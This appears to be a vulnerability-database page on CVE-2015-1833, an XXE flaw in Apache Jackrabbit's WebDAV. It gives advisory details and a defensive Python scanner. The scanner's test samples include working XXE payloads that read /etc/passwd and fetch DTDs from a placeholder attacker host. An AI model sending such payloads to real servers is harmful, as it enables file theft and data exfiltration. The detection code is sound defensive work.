CVE-2015-1833

Apache Jackrabbit XML External Entity Injection via WebDAV Request

Exploitation Summary

EIP tracks 1 public exploit for CVE-2015-1833, a PoC published by Mikhail Egorov.

AI-analyzed exploit summary: the exploit demonstrates an XXE (XML External Entity) vulnerability in Apache Jackrabbit's WebDAV module (CVE-2015-1833). It implements three techniques (inb1, inb2, oob) to exfiltrate file contents via crafted PROPPATCH/PROPFIND requests, or out-of-band over FTP.

Description

XML external entity (XXE) vulnerability in Apache Jackrabbit before 2.0.6, 2.2.x before 2.2.14, 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.1, and 2.10.x before 2.10.1 allows remote attackers to read arbitrary files and send requests to intranet servers via a crafted WebDAV request.
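The crafted-request shape described above can be screened for before the body ever reaches the application's XML parser. What follows is an added example for this page, not Jackrabbit's code and not the published PoC; the request bodies in it are constructed to resemble the technique shapes named in the exploit summary (in-band entity in a property value, external DTD, parameter entity for out-of-band exfiltration), with a placeholder host (attacker.invalid) and placeholder paths, and the Python standard library's expat bindings do the inspection:

```python
"""Scan WebDAV PROPPATCH/PROPFIND bodies for XXE payloads before they reach
the application's XML parser.

Added example for this page; it is not Jackrabbit's code and not the
published PoC. The sample bodies below are constructed, not captured
traffic; hostnames and paths are placeholders. Standard library only.
"""
import xml.parsers.expat as expat

# Constructed sample request bodies, one per technique shape.
SAMPLES = {
    # In-band: the entity lands in a property value that a later
    # PROPFIND would read back.
    "inb_proppatch": b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE propertyupdate [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<D:propertyupdate xmlns:D="DAV:">
  <D:set><D:prop><leak>&xxe;</leak></D:prop></D:set>
</D:propertyupdate>
""",
    # External DTD fetched from a server the attacker controls.
    "ext_dtd_propfind": b"""<?xml version="1.0"?>
<!DOCTYPE propfind SYSTEM "http://attacker.invalid/evil.dtd">
<D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>
""",
    # Parameter entity, the usual shape of an out-of-band payload.
    "oob_param_entity": b"""<?xml version="1.0"?>
<!DOCTYPE propfind [
  <!ENTITY % dtd SYSTEM "http://attacker.invalid/oob.dtd">
  %dtd;
]>
<D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>
""",
    # Ordinary client request: no DOCTYPE at all.
    "benign_propfind": b"""<?xml version="1.0" encoding="utf-8"?>
<D:propfind xmlns:D="DAV:"><D:prop><D:displayname/></D:prop></D:propfind>
""",
}


def scan_webdav_body(body: bytes) -> list[str]:
    """Return a list of findings describing DTD constructs in *body*.

    expat runs with its defaults: it never fetches external DTDs or
    entities, so the scanner itself cannot be turned into an XXE. Each
    declaration is reported as the parser sees it, which is more robust
    than a regex over the raw bytes (comments, CDATA and encodings are
    handled by the parser rather than by us).
    """
    findings: list[str] = []
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(f"doctype:{name}")
        if system_id:  # <!DOCTYPE x SYSTEM "..."> pulls a remote DTD
            findings.append(f"external-dtd:{system_id}")

    def on_entity_decl(name, is_param, value, base, system_id,
                       public_id, notation):
        kind = "parameter-entity" if is_param else "general-entity"
        if system_id:
            findings.append(f"external-{kind}:{name}->{system_id}")
        else:
            findings.append(f"internal-{kind}:{name}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:
        # A truncated or malformed body keeps whatever was declared
        # before the error; it is rejected either way.
        findings.append(f"malformed:{exc}")
    return findings


def is_xxe_suspicious(body: bytes) -> bool:
    """Policy: a WebDAV request body never needs a DOCTYPE, so any DTD
    construct (or a body the parser cannot read) is grounds to reject."""
    return bool(scan_webdav_body(body))


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        verdict = "REJECT" if is_xxe_suspicious(body) else "allow"
        print(f"{label:18} {verdict:6} {scan_webdav_body(body)}")
```

Run it directly to get a verdict per sample. The policy is the standard XXE one: a WebDAV body never needs a DOCTYPE, so rejecting any DTD construct loses nothing legitimate. On the Java side the equivalent server-side hardening is to configure the JAXP parser with the Xerces feature http://apache.org/xml/features/disallow-doctype-decl set to true (and the external general/parameter entity features off) before parsing request bodies; that is the generic JAXP fix, not a description of the JCR-3883 patch itself.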

Exploits (1)

exploit-db · Working PoC
by Mikhail Egorov · python · webapps · java
https://www.exploit-db.com/exploits/37110

Classification: Working PoC (95% confidence)
Attack type: Info leak
Complexity: Moderate
Reliability: Reliable
Target: Apache Jackrabbit WebDAV (unpatched versions; see the Description for the fixed release of each branch), Apache Sling, Adobe AEM
Authentication: none required
Prerequisites: Network access to the target WebDAV endpoint · For the inb2/oob techniques, an attacker-reachable IP for callback communication
Analysis: devstral-2, Feb 16, 2026

References (8 in record, 5 shown)

Debian DSA-3298 (third-party advisory, vendor-advisory): http://www.debian.org/security/2015/dsa-3298
SecurityFocus BID 74761 (VDB entry): http://www.securityfocus.com/bid/74761
Exploit-DB 37110 (exploit): https://www.exploit-db.com/exploits/37110/
Bugtraq mailing-list post (third-party advisory): http://www.securityfocus.com/archive/1/535582/100/0/threaded
Apache JIRA JCR-3883 (vendor advisory): https://issues.apache.org/jira/browse/JCR-3883

Scores

EPSS 0.3103
EPSS Percentile 96.9%

Details

CWE
CWE-20
Status published
Products (28)
apache/jackrabbit 2.2.0
apache/jackrabbit 2.2.1
apache/jackrabbit 2.2.2
apache/jackrabbit 2.2.4
apache/jackrabbit 2.2.5
apache/jackrabbit 2.2.7
apache/jackrabbit 2.2.8
apache/jackrabbit 2.2.9
apache/jackrabbit 2.2.10
apache/jackrabbit 2.2.11
... and 18 more
Published May 29, 2015
Tracked Since Feb 18, 2026